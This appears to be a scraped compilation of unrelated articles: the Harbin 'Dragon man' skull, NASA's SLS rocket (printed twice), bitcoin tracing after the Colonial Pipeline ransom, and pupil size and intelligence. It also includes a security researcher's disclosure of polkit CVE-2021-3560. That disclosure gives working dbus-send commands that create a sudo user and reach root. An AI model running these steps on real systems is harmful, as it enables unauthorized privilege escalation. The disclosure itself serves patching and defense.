Iqsoft Guarantees Satisfaction

Or Your Money back !!!

Ask for a quote
Massive human head from China forces scientists to rethink evolution

Massive human head in Chinese well forces scientists to rethink evolution

‘Dragon man’ skull reveals new branch of family tree more closely related to modern humans than Neanderthals

Fossilised skull found in Chinese well
Chinese researchers have called the skull, found in Harbin in the north, Homo longi, or ‘Dragon man’, but other experts are more cautious about naming a new species. Photograph: Wei Gao
 
 Science editor

 

 

The discovery of a huge fossilised skull that was wrapped up and hidden in a Chinese well nearly 90 years ago has forced scientists to rewrite the story of human evolution.

Analysis of the remains has revealed a new branch of the human family tree that points to a previously unknown sister group more closely related to modern humans than the Neanderthals.

 

The extraordinary fossil has been named a new human species, Homo longi or “Dragon man”, by Chinese researchers, although other experts are more cautious about the designation.

“I think this is one of the most important finds of the past 50 years,” said Prof Chris Stringer, research leader at the Natural History Museum in London, who worked on the project. “It’s a wonderfully preserved fossil.”

The skull appears to have a remarkable backstory. According to the researchers, it was originally found in 1933 by Chinese labourers building a bridge over the Songhua River in Harbin, in China’s northernmost province, Heilongjiang, during the Japanese occupation. To keep the skull from falling into Japanese hands it was wrapped and hidden in an abandoned well, resurfacing only in 2018 after the man who hid it told his grandson about it shortly before he died.

‘Dragon man’ in his habitat
‘Dragon man’ in his habitat. Photograph: Chuang Zhao

An international team led by Prof Qiang Ji at the Hebei Geo University in China drew on geochemical techniques to narrow down when the skull came to rest in Harbin, dating the bones to at least 146,000 years old. The skull has a unique combination of primitive and more modern features, with the face, in particular, more closely resembling Homo sapiens. One huge molar remains.

The skull, which is 23cm long and more than 15cm wide, is substantially larger than a modern human’s and has ample room, at 1,420ml, for a modern human brain. Beneath the thick brow ridge, the face has large square eye sockets, but is delicate despite its size. “This guy had a huge head,” said Stringer.

The researchers believe the skull belonged to a male, about 50 years old, who would have been an impressive physical specimen. His wide, bulbous nose allowed him to breathe huge volumes of air, indicating a high-energy lifestyle, while sheer size would have helped him withstand the brutally cold winters in the region. “Homo longi is heavily built, very robust,” said Prof Xijun Ni, a paleoanthropologist at Hebei. “It is hard to estimate the height, but the massive head should match a height higher than the average of modern humans.”

Advertisement

To work out where the Harbin individual fitted into human history, the scientists fed measurements from the fossil and 95 other skulls into software that compiled the most likely family tree. To their surprise, the Harbin skull and a handful of others from China formed a new branch closer to modern humans than Neanderthals.

The Chinese researchers believe the Harbin skull is distinct enough to make it a new species, but Stringer is not convinced. He believes it is similar to another found in Dali county in China in 1978.

“I prefer to call it Homo daliensis, but it’s not a big deal,” he said. “The important thing is the third lineage of later humans that are separate from Neanderthals and separate from Homo sapiens.” Details are published in three papers in The Innovation.

Whatever the name, one possibility is that the Harbin skull is Denisovan, a mysterious group of extinct humans known largely from DNA and bone fragments recovered from Siberia. “Certainly this specimen could be Denisovan but we have to be cautious. What we need is much more complete skeletal material of the Denisovans alongside DNA,” Stringer said.

'Dragon Man': reconstruction shows skull of humans' closest cousin – video

 
00:21
‘Dragon Man’: reconstruction shows skull of humans’ closest cousin – video

Prof John Hawks, a paleoanthropologist at the University of Wisconsin-Madison, said the idea of a new lineage of humans was “a provocative claim”, because skulls can look similar even among distant relatives. The skull being Denisovan was a good hypothesis, he added, though he was less keen on a new species name. “I think it’s a bad moment in science to be naming new species among these large-brained humans that all interbred with each other,” he said. “What we are repeatedly finding is that the differences in looks didn’t mean much to these ancient people when it comes to breeding.”

Mark Maslin, a professor of earth system science at UCL and the author of The Cradle of Humanity, said: “The beautifully preserved Chinese Harbin archaic human skull adds even more evidence that human evolution was not a simple evolutionary tree but a dense intertwined bush. We now know that there were as many as 10 different species of hominins at the same time as our own species emerged.

“Genetic analysis shows that these species interacted and interbred – our own genetics contain the legacy of many of these ghost species. But what is a sobering thought, is that despite all this diversity, a new version of Homo sapiens emerged from Africa about 60,000 years ago which clearly out-competed, out-bred, and even out-fought these other closely related species, causing their extinction. It is only by painstaking searching and analysis of their fossils, such as the Harbin skull, do we know of their existence.”

How to get root on Linux with a seven-year-old bug

Privilege escalation with polkit: 

Image of Kevin Backhouse

polkit is a system service installed by default on many Linux distributions. It’s used by systemd, so any Linux distribution that uses systemd also uses polkit. As a member of GitHub Security Lab, my job is to help improve the security of open source software by finding and reporting vulnerabilities. A few weeks ago, I found a privilege escalation vulnerability in polkit. I coordinated the disclosure of the vulnerability with the polkit maintainers and with Red Hat’s security team. It was publicly disclosed, the fix was released on June 3, 2021, and it was assigned CVE-2021-3560.

The vulnerability enables an unprivileged local user to get a root shell on the system. It’s easy to exploit with a few standard command line tools, as you can see in this short video. In this blog post, I’ll explain how the exploit works and show you where the bug was in the source code.

Table of contents

 

History of CVE-2021-3560 and vulnerable distributions

The bug I found was quite old. It was introduced seven years ago in commit bfa5036 and first shipped with polkit version 0.113. However, many of the most popular Linux distributions didn’t ship the vulnerable version until more recently.

The bug has a slightly different history on Debian and its derivatives (such as Ubuntu), because Debian uses a fork of polkit with a different version numbering scheme. In the Debian fork, the bug was introduced in commit f81d021 and first shipped with version 0.105-26. The most recent stable release of Debian, Debian 10 (“buster”), uses version 0.105-25, which means that it isn’t vulnerable. However, some Debian derivatives, such as Ubuntu, are based on Debian unstable, which is vulnerable.

Here’s a table with a selection of popular distributions and whether they’re vulnerable (note that this isn’t a comprehensive list):

Distribution Vulnerable?
RHEL 7 No
RHEL 8 Yes
Fedora 20 (or earlier) No
Fedora 21 (or later) Yes
Debian 10 (“buster”) No
Debian testing (“bullseye”) Yes
Ubuntu 18.04 No
Ubuntu 20.04 Yes

About polkit

polkit is the system service that’s running under the hood when you see a dialog box like the one below:

Screenshot of polkit dialog box prompting authentication

It essentially plays the role of a judge. If you want to do something that requires higher privileges—for example, creating a new user account—then it’s polkit’s job to decide whether or not you’re allowed to do it. For some requests, polkit will make an instant decision to allow or deny, and for others it will pop up a dialog box so that an administrator can grant authorization by entering their password.

The dialog box might give the impression that polkit is a graphical system, but it’s actually a background process. The dialog box is known as an authentication agent and it’s really just a mechanism for sending your password to polkit. To illustrate that polkit isn’t just for graphical sessions, try running this command in a terminal:

pkexec reboot

pkexec is a similar command to sudo, which enables you to run a command as root. If you run pkexec in a graphical session, it will pop up a dialog box, but if you run it in a text-mode session such as SSH then it starts its own text-mode authentication agent:

$ pkexec reboot
==== AUTHENTICATING FOR org.freedesktop.policykit.exec ===
Authentication is needed to run `/usr/sbin/reboot' as the super user
Authenticating as: Kevin Backhouse,,, (kev)
Password:

Another command that you can use to trigger polkit from the command line is dbus-send. It’s a general purpose tool for sending D-Bus messages that’s mainly used for testing, but it’s usually installed by default on systems that use D-Bus. It can be used to simulate the D-Bus messages that the graphical interface might send. For example, this is the command to create a new user:

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1

If you run that command in a graphical session, an authentication dialog box will pop up, but if you run it in a text-mode session such as SSH, then it fails immediately. That’s because, unlike pkexecdbus-send does not start its own authentication agent.

Exploitation steps

The vulnerability is surprisingly easy to exploit. All it takes is a few commands in the terminal using only standard tools like bashkill, and dbus-send.

The proof of concept (PoC) exploit I describe in this section depends on two packages being installed: accountsservice and gnome-control-center. On a graphical system such as Ubuntu Desktop, both of those packages are usually installed by default. But if you’re using something like a non-graphical RHEL server, then you might need to install them, like this:

sudo yum install accountsservice gnome-control-center

Of course, the vulnerability doesn’t have anything specifically to do with either accountsservice or gnome-control-center. They’re just polkit clients that happen to be convenient vectors for exploitation. The reason why the PoC depends on gnome-control-center and not just accountsservice is subtle—I’ll explain that later.

To avoid repeatedly triggering the authentication dialog box (which can be annoying), I recommend running the commands from an SSH session:

ssh localhost

The vulnerability is triggered by starting a dbus-send command but killing it while polkit is still in the middle of processing the request. I like to think that it’s theoretically possible to trigger by smashing Ctrl+C at just the right moment, but I’ve never succeeded, so I do it with a small amount of bash scripting instead. First, you need to measure how long it takes to run the dbus-send command normally:

time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1

The output will look something like this:

Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required

real 0m0.016s
user 0m0.005s
sys 0m0.000s

That took 16 milliseconds for me, so that means that I need to kill the dbus-send command after approximately 8 milliseconds:

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1 & sleep 0.008s ; kill $!

You might need to run that a few times, and you might need to experiment with the number of milliseconds in the delay. When the exploit succeeds, you’ll see that a new user named boris has been created:

$ id boris
uid=1002(boris) gid=1002(boris) groups=1002(boris),27(sudo)

Notice that boris is a member of the sudo group, so you’re already well on your way to full privilege escalation. Next, you need to set a password for the new account. The D-Bus interface expects a hashed password, which you can create using openssl:

$ openssl passwd -5 iaminvincible!
$5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB

Now you just have to do the same trick again, except this time call the SetPassword D-Bus method:

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1002 org.freedesktop.Accounts.User.SetPassword string:'$5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB' string:GoldenEye & sleep 0.008s ; kill $!

Again, you might need to experiment with the length of the delay and run it several times until it succeeds. Also, note that you need to paste in the correct user identifier (UID), which is “1002” in this example, plus the password hash from the openssl command.

Now you can login as boris and become root:

su - boris # password: iaminvincible!
sudo su # password: iaminvincible!

polkit architecture

To help explain the vulnerability, here’s a diagram of the five main processes involved during the dbus-send command:

Diagram showing five processes involved in dbus-send command: "d-bus send" and "authentication agent" above the line, and "accounts-daemon" and "polkit" below the line, with dbus-daemon serving as the go-between

The two processes above the dashed line—dbus-send and the authentication agent—are unprivileged user processes. Those below the line are privileged system processes. In the center is dbus-daemon, which handles all of the communication: the other four processes communicate with each other by sending D-Bus messages.

dbus-daemon plays a very important role in the security of polkit, because it enables the four processes to communicate securely and check each other’s credentials. For example, when the authentication agent sends an authentication cookie to polkit, it does so by sending it to the org.freedesktop.PolicyKit1 D-Bus address. Since that address is only allowed to be registered by a root process, there is no risk of an unprivileged process intercepting messages. dbus-daemon also assigns every connection a “unique bus name:” typically something like “:1.96”. It’s a bit like a process identifier (PID), except without being vulnerable to PID recycling attacks. Unique bus names are currently chosen from a 64-bit range, so there’s no risk of a vulnerability caused by a name being reused.

This is the sequence of events:

  1. dbus-send asks accounts-daemon to create a new user.
  2. accounts-daemon receives the D-Bus message from dbus-send. The message includes the unique bus name of the sender. Let’s assume it’s “:1.96”. This name is attached to the message by dbus-daemon and cannot be forged.
  3. accounts-daemon asks polkit if connection :1.96 is authorized to create a new user.
  4. polkit asks dbus-daemon for the UID of connection :1.96.
  5. If the UID of connection :1.96 is “0,” then polkit immediately authorizes the request. Otherwise, it sends the authentication agent a list of administrator users who are allowed to authorize the request.
  6. The authentication agent opens a dialog box to get the password from the user.
  7. The authentication agent sends the password to polkit.
  8. polkit sends a “yes” reply back to accounts-daemon.
  9. accounts-daemon creates the new user account.

The vulnerability

Why does killing the dbus-send command cause an authentication bypass? The vulnerability is in step four of the sequence of events listed above. What happens if polkit asks dbus-daemon for the UID of connection :1.96, but connection :1.96 no longer exists? dbus-daemon handles that situation correctly and returns an error. But it turns out that polkit does not handle that error correctly. In fact, polkit mishandles the error in a particularly unfortunate way: rather than rejecting the request, it treats the request as though it came from a process with UID 0. In other words, it immediately authorizes the request because it thinks the request has come from a root process.

Why is the timing of the vulnerability non-deterministic? It turns out that polkit asks dbus-daemon for the UID of the requesting process multiple times, on different codepaths. Most of those codepaths handle the error correctly, but one of them doesn’t. If you kill the dbus-send command early, it’s handled by one of the correct codepaths and the request is rejected. To trigger the vulnerable codepath, you have to disconnect at just the right moment. And because there are multiple processes involved, the timing of that “right moment” varies from one run to the next. That’s why it usually takes a few tries for the exploit to succeed. I’d guess it’s also the reason why the bug wasn’t previously discovered. If you could trigger the vulnerability by killing the dbus-send command immediately, then I expect it would have been discovered a long time ago, because that’s a much more obvious thing to test for.

The function which asks dbus-daemon for the UID of the requesting connection is named polkit_system_bus_name_get_creds_sync:

static gboolean
polkit_system_bus_name_get_creds_sync (
PolkitSystemBusName           *system_bus_name,
    guint32                       *out_uid,
    guint32                       *out_pid,
    GCancellable                  *cancellable,
    GError                       **error)

The behavior of polkit_system_bus_name_get_creds_sync is strange, because when an error occurs, the function sets the error parameter but still returns TRUE. It wasn’t clear to me, when I wrote my bug report, whether that was a bug or a deliberate design choice. (It turns out that it was a bug, because the polkit developers have fixed the vulnerability by returning FALSE on error.) My uncertainty arose from the fact that almost all the callers of polkit_system_bus_name_get_creds_sync don’t just check the Boolean result, but also check that the error value is still NULL before proceeding. The cause of the vulnerability was that the error value wasn’t checked in the following stack trace:

0 in polkit_system_bus_name_get_creds_sync of polkitsystembusname.c:388
1 in polkit_system_bus_name_get_user_sync of polkitsystembusname.c:511
2 in polkit_backend_session_monitor_get_user_for_subject of polkitbackendsessionmonitor-systemd.c:303
3 in check_authorization_sync of polkitbackendinteractiveauthority.c:1121
4 in check_authorization_sync of polkitbackendinteractiveauthority.c:1227
5 in polkit_backend_interactive_authority_check_authorization of polkitbackendinteractiveauthority.c:981
6 in polkit_backend_authority_check_authorization of polkitbackendauthority.c:227
7 in server_handle_check_authorization of polkitbackendauthority.c:790
7 in server_handle_method_call of polkitbackendauthority.c:1272

The bug is in this snippet of code in check_authorization_sync:

/* every subject has a user; this is supplied by the client, so we rely
 * on the caller to validate its acceptability. */
user_of_subject = polkit_backend_session_monitor_get_user_for_subject (priv->session_monitor,
                                                                       subject, NULL,
                                                                       error);
if (user_of_subject == NULL)
    goto out;

/* special case: uid 0, root, is _always_ authorized for anything */
if (POLKIT_IS_UNIX_USER (user_of_subject) && polkit_unix_user_get_uid (POLKIT_UNIX_USER (user_of_subject)) == 0)
  {
    result = polkit_authorization_result_new (TRUE, FALSE, NULL);
    goto out;
  }

Notice that the value of error is not checked.

org.freedesktop.policykit.imply annotations

I mentioned earlier that my PoC depends on gnome-control-center being installed, in addition to accountsservice. Why is that? The PoC doesn’t use gnome-control-center in any visible way, and I didn’t even realize that I was depending on it when I wrote the PoC! In fact, I only found out because the Red Hat security team couldn’t reproduce my PoC on RHEL. When I tried it for myself on a RHEL 8.4 VM, I also found that the PoC didn’t work. That was puzzling, because it was working beautifully on Fedora 32 and CentOS Stream. The crucial difference, it turned out, was that my RHEL VM was a non-graphical server with no GNOME installed. So why does that matter? The answer is policykit.imply annotations.

Some polkit actions are essentially equivalent to each other, so if one has already been authorized then it makes sense to silently authorize the other. The GNOME settings dialog is a good example:

Screenshot of GNOME settings dialog

After you’ve clicked the “Unlock” button and entered your password, you can do things like adding a new user account without having to authenticate a second time. That’s handled by a policykit.imply annotation, which is defined in this config file:

/usr/share/polkit-1/actions/org.gnome.controlcenter.user-accounts.policy

The config file contains the following implication:

In other words, if you’re authorized to perform controlcenter admin actions, then you’re also authorized to perform accountsservice admin actions.

When I attached GDB to polkit on my RHEL VM, I found that I wasn’t seeing the vulnerable stack trace that I listed earlier. Notice that step four of the stack trace is a recursive call from check_authorization_sync to itself. That happens on line 1227, which is where polkit checks the policykit.imply annotations:

PolkitAuthorizationResult *implied_result = NULL;
PolkitImplicitAuthorization implied_implicit_authorization;
GError *implied_error = NULL;
const gchar *imply_action_id;

imply_action_id = polkit_action_description_get_action_id (imply_ad);

/* g_debug ("%s is implied by %s, checking", action_id, imply_action_id); */
implied_result = check_authorization_sync (authority, caller, subject,
                                           imply_action_id,
                                           details, flags,
                                           &implied_implicit_authorization, TRUE,
                                           &implied_error);
if (implied_result != NULL)
  {
    if (polkit_authorization_result_get_is_authorized (implied_result))
      {
        g_debug (" is authorized (implied by %s)", imply_action_id);
        result = implied_result;
        /* cleanup */
        g_strfreev (tokens);
        goto out;
      }
    g_object_unref (implied_result);
  }
if (implied_error != NULL)
  g_error_free (implied_error);

The authentication bypass depends on the error value getting ignored. It was ignored on line 1121, but it’s still stored in the error parameter, so it also needs to be ignored by the caller. The block of code above has a temporary variable named implied_error, which is ignored when implied_result isn’t null. That’s the crucial step that makes the bypass possible.

To sum up, the authentication bypass only works on polkit actions that are implied by another polkit action. That’s why my PoC only works if gnome-control-center is installed: it adds the policykit.imply annotation that enables me to target accountsservice. That does not mean that RHEL is safe from this vulnerability, though. Another attack vector for the vulnerability is packagekit, which is installed by default on RHEL and has a suitable policykit.imply annotation for the package-install action. packagekit is used to install packages, so it can be exploited to install gnome-control-center, after which the rest of the exploit works as before.

Conclusion

CVE-2021-3560 enables an unprivileged local attacker to gain root privileges. It’s very simple and quick to exploit, so it’s important that you update your Linux installations as soon as possible. Any system that has polkit version 0.113 (or later) installed is vulnerable. That includes popular distributions such as RHEL 8 and Ubuntu 20.04.

And if you like nerding out about security vulnerabilities (and how to fix them) check out some of the other work that the Security Lab team is doing or follow us on Twitter.

NASA’s moon rocket

SLS: First view of Nasa’s assembled ‘megarocket’

By Paul Rincon
Science editor, BBC News website

Published
Related Topics

SLSIMAGE COPYRIGHTNASA
image captionThe core stage and twin booster rockets stand taller than the Statue of Liberty (minus its pedestal)

Nasa has assembled the first of its powerful Space Launch System (SLS) rockets, which will carry humans to the Moon this decade.

On Friday, engineers at Florida’s Kennedy Space Center finished lowering the 65m (212ft) -tall core stage in-between two smaller booster rockets.

It’s the first time all three key elements of the rocket have been together in their launch configuration.

Nasa plans to launch the SLS on its maiden flight later this year.

During this mission, known as Artemis-1, the SLS will carry Orion – America’s next-generation crew vehicle – towards the Moon. However, no astronauts will be aboard; engineers want to put both the rocket and the spaceship through their paces before humans are allowed on in 2023.

Core stage being lifted up from its position in the transfer aisle at the Vehicle Assembly Building (VAB)IMAGE COPYRIGHTNASA
image captionCore stage being lifted up from its position in the transfer aisle at the Vehicle Assembly Building (VAB)

The SLS consists of the giant core stage, which houses propellant tanks and four powerful engines, flanked by two 54m (177ft) -long solid rocket boosters (SRBs). They provide most of the thrust-force that propels the SLS off the ground in the first two minutes of flight.

 

Both the core stage and the SRBs are taller than the Statue of Liberty, minus its pedestal.

Over Friday and Saturday, teams at Kennedy Space Center used a heavy-lift crane to first hoist the core stage, transfer it from a horizontal to a vertical position, and then lower it into place between the SRBs on a structure called the mobile launcher.

This structure currently resides inside the huge, cuboid Vehicle Assembly Building (VAB).

SLSIMAGE COPYRIGHTNASA
image captionAfter being lifted, the core stage was rotated into the vertical position

The mobile launcher allows access to the SLS for testing, checkout and servicing. It will also transfer the giant rocket to the launch pad.

Engineers began stacking the SRBs on the mobile launcher in November last year.

While this was going on, the core stage was attached to a test stand in Mississippi, undergoing a comprehensive programme of evaluation known as the Green Run.

 
Artemis artworkIMAGE COPYRIGHTNASA
image captionArtwork: Nasa wants to return to the Moon, but this time it wants to stay

In March, the core stage engines were fired successfully for around eight minutes – the time taken for the SLS to get from the ground to space – in the Green Run’s final and most important test.

After refurbishment, the core was taken by barge to Kennedy Space Center.

Artemis-3, which will be the first mission to land humans on the Moon since Apollo 17 in 1972, should launch in the next few years. Nasa recently awarded the contract to build the next-generation Moon lander to SpaceX, which is adapting its Starship design for the purpose.

SLS: First view of Nasa’s assembled ‘megarocket’

By Paul Rincon
Science editor, BBC News website

Published
Related Topics

SLSIMAGE COPYRIGHTNASA
image captionThe core stage and twin booster rockets stand taller than the Statue of Liberty (minus its pedestal)

Nasa has assembled the first of its powerful Space Launch System (SLS) rockets, which will carry humans to the Moon this decade.

On Friday, engineers at Florida’s Kennedy Space Center finished lowering the 65m (212ft) -tall core stage in-between two smaller booster rockets.

It’s the first time all three key elements of the rocket have been together in their launch configuration.

Nasa plans to launch the SLS on its maiden flight later this year.

During this mission, known as Artemis-1, the SLS will carry Orion – America’s next-generation crew vehicle – towards the Moon. However, no astronauts will be aboard; engineers want to put both the rocket and the spaceship through their paces before humans are allowed on in 2023.

Core stage being lifted up from its position in the transfer aisle at the Vehicle Assembly Building (VAB)IMAGE COPYRIGHTNASA
image captionCore stage being lifted up from its position in the transfer aisle at the Vehicle Assembly Building (VAB)

The SLS consists of the giant core stage, which houses propellant tanks and four powerful engines, flanked by two 54m (177ft) -long solid rocket boosters (SRBs). They provide most of the thrust-force that propels the SLS off the ground in the first two minutes of flight.

 

Both the core stage and the SRBs are taller than the Statue of Liberty, minus its pedestal.

Over Friday and Saturday, teams at Kennedy Space Center used a heavy-lift crane to first hoist the core stage, transfer it from a horizontal to a vertical position, and then lower it into place between the SRBs on a structure called the mobile launcher.

This structure currently resides inside the huge, cuboid Vehicle Assembly Building (VAB).

SLSIMAGE COPYRIGHTNASA
image captionAfter being lifted, the core stage was rotated into the vertical position

The mobile launcher allows access to the SLS for testing, checkout and servicing. It will also transfer the giant rocket to the launch pad.

Engineers began stacking the SRBs on the mobile launcher in November last year.

While this was going on, the core stage was attached to a test stand in Mississippi, undergoing a comprehensive programme of evaluation known as the Green Run.

 
Artemis artworkIMAGE COPYRIGHTNASA
image captionArtwork: Nasa wants to return to the Moon, but this time it wants to stay

In March, the core stage engines were fired successfully for around eight minutes – the time taken for the SLS to get from the ground to space – in the Green Run’s final and most important test.

After refurbishment, the core was taken by barge to Kennedy Space Center.

Artemis-3, which will be the first mission to land humans on the Moon since Apollo 17 in 1972, should launch in the next few years. Nasa recently awarded the contract to build the next-generation Moon lander to SpaceX, which is adapting its Starship design for the purpose.

Bitcoin transactions are more transparent than cash

Colonial Pipeline investigation upends idea that Bitcoin is untraceable

When Bitcoin burst onto the scene in 2009, fans heralded the cryptocurrency as a secure, decentralized and anonymous way to conduct transactions outside the traditional financial system.

Criminals, often operating in hidden reaches of the internet, flocked to Bitcoin to do illicit business without revealing their names or locations. The digital currency quickly became as popular with drug dealers and tax evaders as it was with contrarian libertarians.

But this week’s revelation that federal officials had recovered most of the Bitcoin ransom paid in the recent Colonial Pipeline ransomware attack exposed a fundamental misconception about cryptocurrencies: They are not as hard to track as cybercriminals think.

On Monday, the Justice Department announced it had traced 63.7 of the 75 bitcoins — some $2.3 million of the $4.3 million — that Colonial Pipeline had paid to the hackers as the ransomware attack shut down the company’s computer systems, prompting fuel shortages and a spike in gasoline prices. Officials have since declined to provide more details about how exactly they recouped the bitcoin.

Yet for the growing community of cryptocurrency enthusiasts and investors, the fact that federal investigators had tracked the ransom as it moved through at least 23 different electronic accounts belonging to DarkSide, the hacking collective, before accessing one account showed that law enforcement was growing along with the industry.

That’s because the same properties that make cryptocurrencies attractive to cybercriminals — the ability to transfer money instantaneously without a bank’s permission — can be leveraged by law enforcement to track and seize criminals’ funds at the speed of the internet.

ADVERTISING

Bitcoin is also traceable. While the digital currency can be created, moved and stored outside the purview of any government or financial institution, each payment is recorded in a permanent fixed ledger, called the blockchain.

That means all Bitcoin transactions are out in the open. The Bitcoin ledger can be viewed by anyone who is plugged into the blockchain.

“It is digital breadcrumbs,” said Kathryn Haun, a former federal prosecutor and investor at venture-capital firm Andreessen Horowitz. “There’s a trail law enforcement can follow rather nicely.”

Haun added that the speed with which the Justice Department seized most of the ransom was “groundbreaking” precisely because of the hackers’ use of cryptocurrency. In contrast, she said, getting records from banks often requires months or years of navigating paperwork and bureaucracy, especially when those banks are overseas.

Given the public nature of the ledger, cryptocurrency experts said, all law enforcement needed to do was figure out how to connect the criminals to a digital wallet, which stores the bitcoin. To do so, authorities likely focused on what is known as a “public key” and a “private key.”

A public key is the string of numbers and letters that Bitcoin holders have for transacting with others, while a “private key” is used to keep a wallet secure. Tracking down a user’s transaction history was a matter of figuring out which public key they controlled, authorities said.

ADVERTISING

Seizing the assets then required obtaining the private key, which is more difficult. It’s unclear how federal agents were able to get DarkSide’s private key.

Justice Department spokesperson Marc Raimondi declined to say more about how the FBI seized DarkSide’s private key. According to court documents, investigators accessed the password for one of the hackers’ Bitcoin wallets, though they did not detail how.

The FBI did not appear to rely on any underlying vulnerability in blockchain technology, cryptocurrency experts said. The likelier culprit was good old-fashioned police work.

 

Federal agents could have seized DarkSide’s private keys by planting a human spy inside DarkSide’s network, hacking the computers where their private keys and passwords were stored, or compelling the service that holds their private wallet to turn them over via search warrant or other means.

“If they can get their hands on the keys, it’s seizable,” said Jesse Proudman, founder of Makara, a cryptocurrency investment site. “Just putting it on a blockchain doesn’t absolve that fact.”

The FBI has partnered with several companies that specialize in tracking cryptocurrencies across digital accounts, according to officials, court documents and the companies. Startups with names like TRM Labs, Elliptic and Chainalysis that trace cryptocurrency payments and flag possible criminal activity have blossomed as law enforcement agencies and banks try to get ahead of financial crime. Their technology traces blockchains looking for patterns that suggest illegal activity. It’s akin to how Google and Microsoft tamed email spam by identifying and then blocking accounts that spray email links across hundreds of accounts.

ADVERTISING

“Cryptocurrency allows us to use these tools to trace funds and financial flows along the blockchain in ways that we could never do with cash,” said Ari Redbord, the head of legal affairs at TRM Labs, a blockchain intelligence company that sells its analytic software to law enforcement and banks. He was previously a senior adviser on financial intelligence and terrorism at the Treasury Department.

Several longtime cryptocurrency enthusiasts said the recovery of much of the Bitcoin ransom was a win for the legitimacy of digital currencies. That would help shift the image of Bitcoin as the playground of criminals, they said.

“The public is slowly being shown, in case after case, that Bitcoin is good for law enforcement and bad for crime — the opposite of what many historically believed,” said Hunter Horsley, chief executive of Bitwise Asset Management, a cryptocurrency investment company.

In recent months, cryptocurrencies have become increasingly mainstream. Companies such as PayPal and Square have expanded their cryptocurrency services. Coinbase, a startup that allows people to buy and sell cryptocurrencies, went public in April and is now valued at $47 billion. Over the weekend, a Bitcoin conference in Miami attracted more than 12,000 attendees, including Twitter’s chief executive, Jack Dorsey, and the boxer Floyd Mayweather Jr.

As more people use Bitcoin, most are accessing the digital currency in a way that mirrors a traditional bank, through a central intermediary like a crypto exchange. In the United States, anti-money laundering and identity verification laws require such services to know who their customers are, creating a link between identity and account. Customers must upload government identification when they sign up.

Ransomware attacks have put unregulated crypto exchanges under the microscope. Cybercriminals have flocked to thousands of high-risk ones in Eastern Europe that do not abide by these laws.

After the Colonial Pipeline attack, several financial leaders proposed a ban on cryptocurrency.

“We can live in a world with cryptocurrency or a world without ransomware, but we can’t have both,” Lee Reiners, the executive director of the Global Financial Markets Center at Duke Law School, wrote in The Wall Street Journal.

Cryptocurrency experts said the hackers could have tried to make their Bitcoin accounts even more secure. Some cryptocurrency holders go to great lengths to store their private keys away from anything connected to the internet, in what is called a “cold wallet.” Some memorize the string of numbers and letters. Others write them down on paper, though those can be obtained by search warrants or police work.

 

“The only way to obtain the truly unseizable characteristic of the asset class is to memorize the keys and not have them written down anywhere,” Proudman, of Makara, said.

Raimondi, of the Justice Department, said the Colonial Pipeline ransom seizure was the latest sting operation by federal prosecutors to recoup illicitly gained cryptocurrency. He said the department has made “many seizures, in the hundreds of millions of dollars, from unhosted cryptocurrency wallets” used for criminal activity. In January, the Justice Department disrupted another ransomware group, NetWalker, which used ransomware to extort money from municipalities, law enforcement agencies and schools.

As part of that sting, the department obtained about $500,000 of NetWalker’s cryptocurrency that had been collected from victims of their ransomware.

ADVERTISING

“While these individuals believe they operate anonymously in the digital space, we have the skill and tenacity to identify and prosecute these actors to the full extent of the law and seize their criminal proceeds,” Maria Chapa Lopez, then the U.S. attorney for the Middle District of Florida, said when the case was announced.

In February, the Justice Department said it had warrants to seize nearly $2 million in cryptocurrencies that North Korean hackers had stolen and put into accounts at two different cryptocurrency exchanges.

Last August, the department also unsealed a complaint outing North Korean hackers who stole $28.7 million of cryptocurrency from a cryptocurrency exchange, and then laundered the proceeds through Chinese cryptocurrency laundering services. The FBI traced the funds to 280 cryptocurrency wallets and their owners.

In the end, “cryptocurrencies are actually more transparent than most other forms of value transfer,” said Madeleine Kennedy, a spokesperson for Chainalysis, the startup that traces cryptocurrency payments. “Certainly more transparent than cash.”

Pupil Size is a Marker of Intelligence?

Pupil Size Is a Marker of Intelligence

There is a surprising correlation between baseline pupil size and several measures of cognitive ability

 
Pupil Size Is a Marker of Intelligence
Credit: Erik Von Weber Getty Images

It has been said that “the eyes are the window to the soul,” but new research suggests that they may be a window to the brain as well.

Our pupils respond to more than just the light. They indicate arousal, interest or mental exhaustion. Pupil dilation is even used by the FBI to detect deception. Now work conducted in our laboratory at the Georgia Institute of Technology suggests that baseline pupil size is closely related to individual differences in intelligence. The larger the pupils, the higher the intelligence, as measured by tests of reasoning, attention and memory. In fact, across three studies, we found that the difference in baseline pupil size between people who scored the highest on the cognitive tests and those who scored the lowest was large enough to be detected by the unaided eye.

We first uncovered this surprising relationship while studying differences in the amount of mental effort people used to complete memory tasks. We used pupil dilations as an indicator of effort, a technique psychologist Daniel Kahneman popularized in the 1960s and 1970s. When we discovered a relationship between baseline pupil size and intelligence, we weren’t sure if it was real or what it meant.

Intrigued, we conducted several large-scale studies in which we recruited more than 500 people aged 18 to 35 from the Atlanta community. We measured participants’ pupil size using an eye tracker, a device that captures the reflection of light off the pupil and cornea using a high-powered camera and computer. We measured participants’ pupils at rest while they stared at a blank computer screen for up to four minutes. All the while, the eye tracker was recording. Using the tracker, we then calculated each participant’s average pupil size.

To be clear, pupil size refers to the diameter of the black circular aperture in the center of the eye. It can range from around two to eight millimeters. The pupil is surrounded by the colorful area known as the iris, which is responsible for controlling the size of the pupil. Pupils constrict in response to bright light, among other things, so we kept the laboratory dim for all participants.

In the next part of the experiment, participants completed a series of cognitive tests designed to measure “fluid intelligence,” the capacity to reason through new problems, “working memory capacity,” the ability to remember information over a period of time, and “attention control,” the ability to focus attention amid distractions and interference.

